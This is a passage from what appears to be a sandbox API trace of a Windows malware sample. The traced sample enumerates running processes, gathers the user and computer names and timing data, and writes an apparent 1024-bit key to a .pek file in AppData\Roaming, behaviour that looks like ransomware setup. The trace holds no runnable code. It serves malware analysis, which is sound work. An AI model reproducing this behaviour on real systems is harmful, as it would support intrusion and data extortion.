cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.800] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.801] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: 
lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.802] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.803] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.805] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.810] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.812] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0096.813] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0096.814] Process32NextW (in: hSnapshot=0xc8, 
lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0096.816] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0096.817] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0096.820] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0096.821] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0096.822] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0096.823] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0096.825] Process32NextW (in: 
hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.826] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.829] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.831] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.832] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.833] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.834] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0096.836] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.961] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.962] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.964] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.965] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.967] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.968] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dllhost.exe")) returned 1 [0096.970] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.971] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.972] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.973] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.975] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.976] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.977] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="cmd.exe")) returned 1 [0096.979] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.980] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.981] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.982] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.984] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.985] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.986] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="cmd.exe")) returned 1 [0096.987] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.988] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.990] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.991] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0096.992] CloseHandle (hObject=0xc8) returned 1 [0096.992] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*.pek", lpFindFileData=0x12f9e8 | out: lpFindFileData=0x12f9e8) returned 0xffffffff [0096.992] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0096.992] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15378120457) returned 1 [0096.992] GetTickCount () returned 0x233bc [0096.992] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2ff)) [0096.992] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0xa, wMilliseconds=0x2ff)) [0096.992] GetCurrentThreadId () returned 0xaf0 [0096.992] GetCurrentThread () returned 0xfffffffe [0096.992] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0096.992] GetCurrentProcessId () returned 0xaec [0096.992] GetCurrentProcess () returned 0xffffffff [0096.992] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0096.992] GetSystemTimes (in: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4 | out: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4) returned 1 [0096.993] QueryPerformanceFrequency (in: lpFrequency=0x12fad8 | out: lpFrequency=0x12fad8) returned 1 [0096.993] GetUserNameA (in: lpBuffer=0x12f9d8, pcbBuffer=0x12f9d4 | out: lpBuffer="EEBsYm5", pcbBuffer=0x12f9d4) returned 1 [0097.373] GetComputerNameA (in: lpBuffer=0x12f9d8, nSize=0x12f9d4 | out: lpBuffer="CRH2YWU7", nSize=0x12f9d4) returned 1 [0097.373] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15416205115) returned 1 [0097.373] GetTickCount () returned 0x233fa [0097.373] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x33d)) [0097.373] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x33d)) [0097.373] Sleep (dwMilliseconds=0x0) [0097.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15418386238) returned 1 [0097.395] 
GetTickCount () returned 0x2340a [0097.395] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x34d)) [0097.395] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x34d)) [0097.395] Sleep (dwMilliseconds=0x1) [0097.411] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15420053809) returned 1 [0097.411] GetTickCount () returned 0x2341a [0097.411] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x35c)) [0097.411] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x35c)) [0097.411] GetCurrentThreadId () returned 0xaf0 [0097.412] GetCurrentThread () returned 0xfffffffe [0097.412] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0097.412] GetCurrentProcessId () returned 0xaec [0097.412] GetCurrentProcess () returned 0xffffffff [0097.412] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0097.412] GetSystemTimes (in: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4 | out: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4) returned 1 [0097.412] Sleep (dwMilliseconds=0x0) [0097.451] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15424067787) returned 1 [0097.451] GetTickCount () returned 0x23448 [0097.452] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb34 | out: lpPerformanceCount=0x12fb34*=15424085147) returned 1 [0097.452] GetTickCount () returned 0x23448 [0097.452] GetLocalTime (in: lpSystemTime=0x12fb2c | out: lpSystemTime=0x12fb2c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetLocalTime (in: lpSystemTime=0x12fb2c | out: lpSystemTime=0x12fb2c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x38b)) [0097.452] GetCurrentThreadId () returned 0xaf0 [0097.452] GetCurrentThread () returned 0xfffffffe [0097.452] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44 | out: lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44) returned 1 [0097.452] GetCurrentProcessId () returned 0xaec [0097.452] GetCurrentProcess () returned 0xffffffff [0097.452] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44 | out: lpCreationTime=0x12fb2c, lpExitTime=0x12fb34, lpKernelTime=0x12fb3c, lpUserTime=0x12fb44) returned 1 [0097.452] GetSystemTimes (in: lpIdleTime=0x12fb2c, lpKernelTime=0x12fb34, lpUserTime=0x12fb3c | out: lpIdleTime=0x12fb2c, lpKernelTime=0x12fb34, lpUserTime=0x12fb3c) returned 1 [0106.489] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793荠\x1c彩\x12眤") returned 256 [0106.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12ebe8, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA279393荠\x1c彩\x12眤") returned 256 [0106.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpWideCharStr=0x12ebe8, cchWideChar=2047 | out: lpWideCharStr="000100016148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA279393荠\x1c彩\x12眤") returned 8 [0106.489] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3188F4D96148D062.pek" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3188f4d96148d062.pek"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 274 [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 274 [0106.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", cchWideChar=274, lpMultiByteStr=0x12bf798, cbMultiByte=274, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1024\r\n3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793\r\n00010001\r\n", lpUsedDefaultChar=0x0) returned 274 [0106.489] WriteFile (in: hFile=0xec, lpBuffer=0x12bf798*, 